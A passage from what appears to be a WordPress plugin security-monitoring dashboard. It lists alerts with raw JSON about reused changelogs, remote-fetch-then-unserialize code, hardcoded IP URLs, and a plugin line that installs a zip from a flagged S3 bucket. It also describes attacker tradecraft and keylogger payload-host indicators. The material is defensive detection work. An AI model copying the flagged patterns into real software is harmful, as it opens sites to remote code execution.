    "current_version": "4.0.0",
    "active_installs": 30,
    "explanation": "Plugin was previously closed by wp.org for a security issue and has now been reopened. Reopens of security-closed plugins are rare and typically indicate the original author fixed the issue \u2014 verify the current committer set matches the pre-closure state, and diff the current trunk against the pre-closure version to confirm no new payload was introduced.",
    "serial_offender_note": "Severity bumped high\u2192critical: author nsthemes has 5 prior security-issue closures on wp.org."
}
Critical bulk_changelog_reuse Resolved 3mo ago
Author slugdevikit
Changelog line* Fixed: PRO upgrade banner styling after WordPress 7.0 admin refresh (button borders and notice link styles).
Plugin count3
Plugin slugsinvoicing-integration-for-fakturownia-and-woocommerce invoicing-integration-for-wfirma-and-woocommerce invoicing-integration-for-infakt-and-woocommerce
Versions1.0.27 1.0.16 1.0.15
Window start2026-05-27 07:39:43
Window end2026-05-27 07:42:36
Total installs170
Recent committer joins3
ExplanationSame changelog first-line reused across ≥3 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern — the Essential Plugin incident used a single "Check compatibility with WordPress version 6.8.2" line across 31 plugins to disguise the initial malicious push.
View raw JSON
{
    "author_slug": "devikit",
    "changelog_line": "* Fixed: PRO upgrade banner styling after WordPress 7.0 admin refresh (button borders and notice link styles).",
    "plugin_count": 3,
    "plugin_slugs": [
        "invoicing-integration-for-fakturownia-and-woocommerce",
        "invoicing-integration-for-wfirma-and-woocommerce",
        "invoicing-integration-for-infakt-and-woocommerce"
    ],
    "versions": [
        "1.0.27",
        "1.0.16",
        "1.0.15"
    ],
    "window_start": "2026-05-27 07:39:43",
    "window_end": "2026-05-27 07:42:36",
    "total_installs": 170,
    "recent_committer_joins": 3,
    "explanation": "Same changelog first-line reused across \u22653 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern \u2014 the Essential Plugin incident used a single \"Check compatibility with WordPress version 6.8.2\" line across 31 plugins to disguise the initial malicious push."
}
Critical bulk_changelog_reuse Resolved 3mo ago
Author slugthemefic
Changelog line- Compatibility: Fully compatible with WordPress v7.0.
Plugin count7
Plugin slugsultimate-addons-for-contact-form-7 beaf-before-and-after-gallery hydra-booking tourfic travelfic-toolkit instantio ultra-addons-for-wpforms
Versions1.4.2 1.0.19 3.3.33 2.22.4 4.7.17 1.1.44 3.5.43
Window start2026-05-26 10:46:54
Window end2026-06-02 05:41:56
Total installs95,850
Recent committer joins1
ExplanationSame changelog first-line reused across ≥3 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern — the Essential Plugin incident used a single "Check compatibility with WordPress version 6.8.2" line across 31 plugins to disguise the initial malicious push.
View raw JSON
{
    "author_slug": "themefic",
    "changelog_line": "- Compatibility: Fully compatible with WordPress v7.0.",
    "plugin_count": 7,
    "plugin_slugs": [
        "ultimate-addons-for-contact-form-7",
        "beaf-before-and-after-gallery",
        "hydra-booking",
        "tourfic",
        "travelfic-toolkit",
        "instantio",
        "ultra-addons-for-wpforms"
    ],
    "versions": [
        "1.4.2",
        "1.0.19",
        "3.3.33",
        "2.22.4",
        "4.7.17",
        "1.1.44",
        "3.5.43"
    ],
    "window_start": "2026-05-26 10:46:54",
    "window_end": "2026-06-02 05:41:56",
    "total_installs": 95850,
    "recent_committer_joins": 1,
    "explanation": "Same changelog first-line reused across \u22653 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern \u2014 the Essential Plugin incident used a single \"Check compatibility with WordPress version 6.8.2\" line across 31 plugins to disguise the initial malicious push."
}
Critical code_pattern RS Remote Site Manager (60 installs) Resolved 3mo ago
Slugrootscope-remote-site-manager
Patterneth_call
Kindioc:code_pattern
Version2.7.6
Hit count1
First hit
File
includes/class-data-collector.php
Line
129
Snippet
'eth_call',
Explanation—
View raw JSON
{
    "slug": "rootscope-remote-site-manager",
    "pattern": "eth_call",
    "kind": "ioc:code_pattern",
    "version": "2.7.6",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/class-data-collector.php",
        "line": 129,
        "snippet": "'eth_call',"
    },
    "explanation": null
}
Critical code_pattern Web Server Information (20 installs) Resolved 3mo ago
Slugwpheka-web-server-information
Patternunserialize_after_remote_call
Kindbuiltin
Version1.7
Hit count1
First hit
File
includes/class-wpheka-info-admin-webserver.php
Line
109
Snippet
L109: $query = @unserialize( wp_remote_retrieve_body( wp_remote_get( 'http://ip-api.com/php → L109: $query = @unserialize( wp_remote_retrieve_body( wp_remote_get( 'http://ip-api.com/php
Explanationa remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file — classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised.
View raw JSON
{
    "slug": "wpheka-web-server-information",
    "pattern": "unserialize_after_remote_call",
    "kind": "builtin",
    "version": "1.7",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/class-wpheka-info-admin-webserver.php",
        "line": 109,
        "snippet": "L109: $query = @unserialize( wp_remote_retrieve_body( wp_remote_get( 'http://ip-api.com/php  \u2192  L109: $query = @unserialize( wp_remote_retrieve_body( wp_remote_get( 'http://ip-api.com/php"
    },
    "explanation": "a remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file \u2014 classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised."
}
Critical code_pattern SpeedyGo (100 installs) Suspicious 3mo ago
Slugspeedy-go
Patternunserialize_after_remote_call
Kindbuiltin
Version2.1.1
Hit count1
First hit
File
includes/api-key-api.php
Line
298
Snippet
L290: $resbody = wp_remote_retrieve_body($response); → L298: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)
Explanationa remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file — classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised.
View raw JSON
{
    "slug": "speedy-go",
    "pattern": "unserialize_after_remote_call",
    "kind": "builtin",
    "version": "2.1.1",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/api-key-api.php",
        "line": 298,
        "snippet": "L290: $resbody = wp_remote_retrieve_body($response);  \u2192  L298: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)"
    },
    "explanation": "a remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file \u2014 classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised."
}
Critical code_pattern Mylerz (40 installs) Resolved 3mo ago
Slugmylerz
Patternhardcoded_ip_url
Kindbuiltin
Version5.0.5
Hit count2
First hit
File
includes/mylerz-ajax.php
Line
15
Snippet
global $mylerz_integration_api; //= 'http://41.33.122.61:58639';
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "mylerz",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "5.0.5",
    "hit_count": 2,
    "first_hit": {
        "file": "includes/mylerz-ajax.php",
        "line": 15,
        "snippet": "global $mylerz_integration_api; //= 'http://41.33.122.61:58639';"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_pattern Unlock Protocol (50 installs) Resolved 3mo ago
Slugunlock-protocol
Patterneth_call
Kindioc:code_pattern
Version4.0.2
Hit count1
First hit
File
inc/classes/class-unlock.php
Line
104
Snippet
'method' => 'eth_call',
Explanation—
View raw JSON
{
    "slug": "unlock-protocol",
    "pattern": "eth_call",
    "kind": "ioc:code_pattern",
    "version": "4.0.2",
    "hit_count": 1,
    "first_hit": {
        "file": "inc/classes/class-unlock.php",
        "line": 104,
        "snippet": "'method'  => 'eth_call',"
    },
    "explanation": null
}
Critical code_pattern AI ChatBot for WooCommerce – WoowBot (1k+ installs) Resolved 3mo ago
Slugwoowbot-woocommerce-chatbot
Patternunserialize_after_remote_call
Kindbuiltin
Version4.7.6
Hit count1
First hit
File
includes/ai_integration/openai/plugin-upgrader/classes/plugin-upgrader.php
Line
189
Snippet
L184: $request = wp_remote_post($this->update_path, $params ); → L189: return @unserialize( $request['body'] );
Explanationa remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file — classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised.
View raw JSON
{
    "slug": "woowbot-woocommerce-chatbot",
    "pattern": "unserialize_after_remote_call",
    "kind": "builtin",
    "version": "4.7.6",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/ai_integration/openai/plugin-upgrader/classes/plugin-upgrader.php",
        "line": 189,
        "snippet": "L184: $request = wp_remote_post($this->update_path, $params );  \u2192  L189: return @unserialize( $request['body'] );"
    },
    "explanation": "a remote HTTP fetch (`wp_remote_*` / `curl_exec`) is followed by `@unserialize` within the same file \u2014 classic PHP Object Injection C2 gadget. The error-suppressed form is the tell: legit code wants to know when deserialize fails; attackers suppress so malformed gadgets do not leak. A real finding regardless of author intent: any plugin that deserializes remote responses without validation is a latent RCE chain if the remote endpoint is ever compromised."
}
Critical code_scan_delta SpeedyGo (100 installs) Suspicious 3mo ago
Slugspeedy-go
Previous version2.1.0
Current version2.1.1
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/api-key-api.php298L290: $resbody = wp_remote_retrieve_body($response); → L298: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)high
New finding count1
View raw JSON
{
    "slug": "speedy-go",
    "previous_version": "2.1.0",
    "current_version": "2.1.1",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/api-key-api.php",
            "line": 298,
            "snippet": "L290: $resbody = wp_remote_retrieve_body($response);  \u2192  L298: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta AI ChatBot for WooCommerce – WoowBot (1k+ installs) Resolved 3mo ago
Slugwoowbot-woocommerce-chatbot
Previous version4.6.1
Current version4.7.6
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/ai_integration/openai/plugin-upgrader/classes/plugin-upgrader.php189L184: $request = wp_remote_post($this->update_path, $params ); → L189: return @unserialize( $request['body'] );high
New finding count1
View raw JSON
{
    "slug": "woowbot-woocommerce-chatbot",
    "previous_version": "4.6.1",
    "current_version": "4.7.6",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/ai_integration/openai/plugin-upgrader/classes/plugin-upgrader.php",
            "line": 189,
            "snippet": "L184: $request = wp_remote_post($this->update_path, $params );  \u2192  L189: return @unserialize( $request['body'] );",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta Formidable PRO2PDF (1k+ installs) Resolved 3mo ago
Slugformidablepro-2-pdf
Previous version3.23
Current version3.24
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinfpropdf.php626L613: $request = wp_remote_get($url); → L626: $files = @unserialize($row['value']);high
New finding count1
View raw JSON
{
    "slug": "formidablepro-2-pdf",
    "previous_version": "3.23",
    "current_version": "3.24",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "fpropdf.php",
            "line": 626,
            "snippet": "L613: $request = wp_remote_get($url);  \u2192  L626: $files = @unserialize($row['value']);",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta Nexter Extension – Security, Performance, Code Snippets & Site Toolkit (10k+ installs) Resolved 3mo ago
Slugnexter-extension
Previous version4.6.10
Current version4.6.11
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltininclude/panel-settings/class-nxt-panel-ajax-router.php782L772: $response = wp_remote_post($theme_api_url, $args); → L782: $theme_info = @unserialize( $body );high
unserialize_after_remote_callbuiltininclude/panel-settings/class-nxt-panel-ajax-router.php874L873: $body = wp_remote_retrieve_body( $response ); → L874: $plugin_info = @unserialize( $body );high
New finding count2
View raw JSON
{
    "slug": "nexter-extension",
    "previous_version": "4.6.10",
    "current_version": "4.6.11",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "include/panel-settings/class-nxt-panel-ajax-router.php",
            "line": 782,
            "snippet": "L772: $response = wp_remote_post($theme_api_url, $args);  \u2192  L782: $theme_info = @unserialize( $body );",
            "confidence": "high"
        },
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "include/panel-settings/class-nxt-panel-ajax-router.php",
            "line": 874,
            "snippet": "L873: $body = wp_remote_retrieve_body( $response );  \u2192  L874: $plugin_info = @unserialize( $body );",
            "confidence": "high"
        }
    ],
    "new_finding_count": 2
}
Critical code_scan_delta FV Flowplayer Video Player (10k+ installs) Resolved 3mo ago
Slugfv-wordpress-flowplayer
Previous version7.5.50.7212
Current version7.5.51.7212
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/fp-api-private.php381L371: $raw_response = wp_remote_post( $this->strPrivateAPI, $request ); → L381: $response = @unserialize( preg_replace( '~^/\*[\s\S]*?\*/\s+~', '', $raw_responshigh
New finding count1
View raw JSON
{
    "slug": "fv-wordpress-flowplayer",
    "previous_version": "7.5.50.7212",
    "current_version": "7.5.51.7212",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/fp-api-private.php",
            "line": 381,
            "snippet": "L371: $raw_response = wp_remote_post( $this->strPrivateAPI, $request );  \u2192  L381: $response = @unserialize( preg_replace( '~^/\\*[\\s\\S]*?\\*/\\s+~', '', $raw_respons",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta Photo Gallery by 10Web – Mobile-Friendly Image Gallery (100k+ installs) Resolved 3mo ago
Slugphoto-gallery
Previous version1.8.41
Current version1.8.42
New findings
PatternKindFileLineSnippetConfidenceDetails
remote_enqueuebuiltinfrontend/views/view.php17wp_register_script( 'instagram-embed', 'https://www.instagram.com/embed.js' );medium
Url
https://www.instagram.com/embed.js
Url host
www.instagram.com
New finding count1
Serial offender noteSeverity bumped high→critical: author 10web has 6 prior security-issue closures on wp.org.
View raw JSON
{
    "slug": "photo-gallery",
    "previous_version": "1.8.41",
    "current_version": "1.8.42",
    "new_findings": [
        {
            "pattern": "remote_enqueue",
            "kind": "builtin",
            "file": "frontend/views/view.php",
            "line": 17,
            "snippet": "wp_register_script( 'instagram-embed', 'https://www.instagram.com/embed.js' );",
            "confidence": "medium",
            "details": {
                "url": "https://www.instagram.com/embed.js",
                "url_host": "www.instagram.com"
            }
        }
    ],
    "new_finding_count": 1,
    "serial_offender_note": "Severity bumped high\u2192critical: author 10web has 6 prior security-issue closures on wp.org."
}
Critical bulk_changelog_reuse Resolved 4mo ago
Author slugbplugins
Changelog line- **Fixed**: Dashboard License Activation issue fixed.
Plugin count3
Plugin slugsanimated-text-block icon-list-block text-typing
Versions1.2.8 2.0.8 1.2.5
Window start2026-05-16 09:54:04
Window end2026-05-16 15:25:59
Total installs11,000
Recent committer joins1
ExplanationSame changelog first-line reused across ≥3 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern — the Essential Plugin incident used a single "Check compatibility with WordPress version 6.8.2" line across 31 plugins to disguise the initial malicious push.
View raw JSON
{
    "author_slug": "bplugins",
    "changelog_line": "- **Fixed**: Dashboard License Activation issue fixed.",
    "plugin_count": 3,
    "plugin_slugs": [
        "animated-text-block",
        "icon-list-block",
        "text-typing"
    ],
    "versions": [
        "1.2.8",
        "2.0.8",
        "1.2.5"
    ],
    "window_start": "2026-05-16 09:54:04",
    "window_end": "2026-05-16 15:25:59",
    "total_installs": 11000,
    "recent_committer_joins": 1,
    "explanation": "Same changelog first-line reused across \u22653 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern \u2014 the Essential Plugin incident used a single \"Check compatibility with WordPress version 6.8.2\" line across 31 plugins to disguise the initial malicious push."
}
Critical bulk_changelog_reuse Resolved 4mo ago
Author slugbplugins
Changelog line- **Fixed**: Dashboard license activation issue fixed.
Plugin count3
Plugin slugsicon-list-block animated-text-block text-typing
Versions1.2.5 1.2.8 2.0.8
Window start2026-05-16 09:54:04
Window end2026-05-16 15:25:59
Total installs11,000
Recent committer joins1
ExplanationSame changelog first-line reused across ≥3 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern — the Essential Plugin incident used a single "Check compatibility with WordPress version 6.8.2" line across 31 plugins to disguise the initial malicious push.
View raw JSON
{
    "author_slug": "bplugins",
    "changelog_line": "- **Fixed**: Dashboard license activation issue fixed.",
    "plugin_count": 3,
    "plugin_slugs": [
        "icon-list-block",
        "animated-text-block",
        "text-typing"
    ],
    "versions": [
        "1.2.5",
        "1.2.8",
        "2.0.8"
    ],
    "window_start": "2026-05-16 09:54:04",
    "window_end": "2026-05-16 15:25:59",
    "total_installs": 11000,
    "recent_committer_joins": 1,
    "explanation": "Same changelog first-line reused across \u22653 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern \u2014 the Essential Plugin incident used a single \"Check compatibility with WordPress version 6.8.2\" line across 31 plugins to disguise the initial malicious push."
}
Critical bulk_changelog_reuse Resolved 4mo ago
Author slugivijanstefan
Changelog line* WordPress 7.0 compatibility
Plugin count3
Plugin slugscyr3lat serbian-transliteration easy-auto-reload
Versions2.5.2 3.7.4 2.0.5
Window start2026-05-21 11:50:52
Window end2026-05-26 11:27:30
Total installs84,000
Recent committer joins1
ExplanationSame changelog first-line reused across ≥3 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern — the Essential Plugin incident used a single "Check compatibility with WordPress version 6.8.2" line across 31 plugins to disguise the initial malicious push.
View raw JSON
{
    "author_slug": "ivijanstefan",
    "changelog_line": "* WordPress 7.0 compatibility",
    "plugin_count": 3,
    "plugin_slugs": [
        "cyr3lat",
        "serbian-transliteration",
        "easy-auto-reload"
    ],
    "versions": [
        "2.5.2",
        "3.7.4",
        "2.0.5"
    ],
    "window_start": "2026-05-21 11:50:52",
    "window_end": "2026-05-26 11:27:30",
    "total_installs": 84000,
    "recent_committer_joins": 1,
    "explanation": "Same changelog first-line reused across \u22653 plugins within 14 days by a committer who recently (<12 months) became attached to at least one of them. Decoy-commit campaign pattern \u2014 the Essential Plugin incident used a single \"Check compatibility with WordPress version 6.8.2\" line across 31 plugins to disguise the initial malicious push."
}
Slugbit-form
PatterngetWPUsers
Kindioc:code_pattern
Version3.0.2
Hit count2
First hit
File
includes/Admin/AdminAjax.php
Line
98
Snippet
add_action('wp_ajax_bitforms_get_wp_users', [$this, 'getWPUsers']);
Explanation—
View raw JSON
{
    "slug": "bit-form",
    "pattern": "getWPUsers",
    "kind": "ioc:code_pattern",
    "version": "3.0.2",
    "hit_count": 2,
    "first_hit": {
        "file": "includes/Admin/AdminAjax.php",
        "line": 98,
        "snippet": "add_action('wp_ajax_bitforms_get_wp_users',   [$this, 'getWPUsers']);"
    },
    "explanation": null
}
Critical code_pattern Geeky Bot – AI Sales Assistant for WooCommerce (6k+ installs) Resolved 4mo ago
Sluggeeky-bot
Patternhardcoded_ip_url
Kindbuiltin
Version1.2.5
Hit count1
First hit
File
modules/slots/model.php
Line
516
Snippet
$url = "http://194.163.183.46:8008/";
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "geeky-bot",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "1.2.5",
    "hit_count": 1,
    "first_hit": {
        "file": "modules/slots/model.php",
        "line": 516,
        "snippet": "$url = \"http://194.163.183.46:8008/\";"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_pattern Social Share Icons & Social Share Buttons (10k+ installs) Suspicious 4mo ago
Slugultimate-social-media-plus
Patternshopify-js-bucket.s3.ap-south-1.amazonaws.com
Kindioc:domain
Version3.7.2
Hit count1
First hit
File
libs/controllers/sfsi_buttons_controller.php
Line
1,712
Snippet
$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');
Explanation—
View raw JSON
{
    "slug": "ultimate-social-media-plus",
    "pattern": "shopify-js-bucket.s3.ap-south-1.amazonaws.com",
    "kind": "ioc:domain",
    "version": "3.7.2",
    "hit_count": 1,
    "first_hit": {
        "file": "libs/controllers/sfsi_buttons_controller.php",
        "line": 1712,
        "snippet": "$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');"
    },
    "explanation": null
}
Critical code_pattern Social Share Icons & Social Share Buttons (10k+ installs) Suspicious 4mo ago
Slugultimate-social-media-plus
Patternwp_ajax_worker_plugin
Kindioc:code_pattern
Version3.7.2
Hit count1
First hit
File
libs/controllers/sfsi_buttons_controller.php
Line
1,691
Snippet
add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');
Explanation—
View raw JSON
{
    "slug": "ultimate-social-media-plus",
    "pattern": "wp_ajax_worker_plugin",
    "kind": "ioc:code_pattern",
    "version": "3.7.2",
    "hit_count": 1,
    "first_hit": {
        "file": "libs/controllers/sfsi_buttons_controller.php",
        "line": 1691,
        "snippet": "add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');"
    },
    "explanation": null
}
Critical code_scan_delta Geeky Bot – AI Sales Assistant for WooCommerce (6k+ installs) Resolved 4mo ago
Sluggeeky-bot
Previous version1.2.4
Current version1.2.5
New findings
PatternKindFileLineSnippetConfidence
hardcoded_ip_urlbuiltinmodules/slots/model.php516$url = "http://194.163.183.46:8008/";high
New finding count1
View raw JSON
{
    "slug": "geeky-bot",
    "previous_version": "1.2.4",
    "current_version": "1.2.5",
    "new_findings": [
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "modules/slots/model.php",
            "line": 516,
            "snippet": "$url = \"http://194.163.183.46:8008/\";",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta Social Share Icons & Social Share Buttons (10k+ installs) Suspicious 4mo ago
Slugultimate-social-media-plus
Previous version3.7.1
Current version3.7.2
New findings
PatternKindFileLineSnippetConfidence
eval_callbuiltinhelpers/linkedin-api/linkedin-api.php123eval($eval);medium
base64_decodebuiltinhelpers/sfsi_plus_OAuth.php212$decoded_sig = base64_decode($signature);medium
shopify-js-bucket.s3.ap-south-1.amazonaws.comioc:domainlibs/controllers/sfsi_buttons_controller.php1,712$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');high
https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zipioc:urllibs/controllers/sfsi_buttons_controller.php1,712$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');high
wp_ajax_worker_pluginioc:code_patternlibs/controllers/sfsi_buttons_controller.php1,691add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');high
sfsi_plus_worker_pluginioc:code_patternlibs/controllers/sfsi_buttons_controller.php1,691add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');medium
sfsi_plus_worker_pluginioc:code_patternlibs/controllers/sfsi_buttons_controller.php1,693function sfsi_plus_worker_plugin(){medium
sfsi_worker_premium_installerioc:code_patternlibs/controllers/sfsi_buttons_controller.php1,705$plugin_slug= "sfsi_worker_premium_installer/sfsi_worker_premium_installer.php";medium
sfsi_worker_premium_installerioc:code_patternlibs/controllers/sfsi_buttons_controller.php1,712$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');medium
sfsi_plus_worker_pluginioc:code_patternviews/sfsi_options_view.php248<a href="javascript:;" id="sfsi_plus_worker_plugin" title="Save" data-nonce="<?php echo $nonce; ?>" data-plugin-list-url="<?php echo admin_url('admin.php?page=sfsi-installer-options'); ?>medium
New finding count10
View raw JSON
{
    "slug": "ultimate-social-media-plus",
    "previous_version": "3.7.1",
    "current_version": "3.7.2",
    "new_findings": [
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "helpers/linkedin-api/linkedin-api.php",
            "line": 123,
            "snippet": "eval($eval);",
            "confidence": "medium"
        },
        {
            "pattern": "base64_decode",
            "kind": "builtin",
            "file": "helpers/sfsi_plus_OAuth.php",
            "line": 212,
            "snippet": "$decoded_sig = base64_decode($signature);",
            "confidence": "medium"
        },
        {
            "pattern": "shopify-js-bucket.s3.ap-south-1.amazonaws.com",
            "kind": "ioc:domain",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1712,
            "snippet": "$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');",
            "confidence": "high"
        },
        {
            "pattern": "https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip",
            "kind": "ioc:url",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1712,
            "snippet": "$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');",
            "confidence": "high"
        },
        {
            "pattern": "wp_ajax_worker_plugin",
            "kind": "ioc:code_pattern",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1691,
            "snippet": "add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');",
            "confidence": "high"
        },
        {
            "pattern": "sfsi_plus_worker_plugin",
            "kind": "ioc:code_pattern",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1691,
            "snippet": "add_action('wp_ajax_worker_plugin','sfsi_plus_worker_plugin');",
            "confidence": "medium"
        },
        {
            "pattern": "sfsi_plus_worker_plugin",
            "kind": "ioc:code_pattern",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1693,
            "snippet": "function sfsi_plus_worker_plugin(){",
            "confidence": "medium"
        },
        {
            "pattern": "sfsi_worker_premium_installer",
            "kind": "ioc:code_pattern",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1705,
            "snippet": "$plugin_slug= \"sfsi_worker_premium_installer/sfsi_worker_premium_installer.php\";",
            "confidence": "medium"
        },
        {
            "pattern": "sfsi_worker_premium_installer",
            "kind": "ioc:code_pattern",
            "file": "libs/controllers/sfsi_buttons_controller.php",
            "line": 1712,
            "snippet": "$installed = $upgrader->install('https://shopify-js-bucket.s3.ap-south-1.amazonaws.com/sfsi_worker_premium_installer-0.0.1.zip');",
            "confidence": "medium"
        },
        {
            "pattern": "sfsi_plus_worker_plugin",
            "kind": "ioc:code_pattern",
            "file": "views/sfsi_options_view.php",
            "line": 248,
            "snippet": "<a href=\"javascript:;\" id=\"sfsi_plus_worker_plugin\" title=\"Save\" data-nonce=\"<?php echo $nonce; ?>\" data-plugin-list-url=\"<?php echo  admin_url('admin.php?page=sfsi-installer-options'); ?>",
            "confidence": "medium"
        }
    ],
    "new_finding_count": 10
}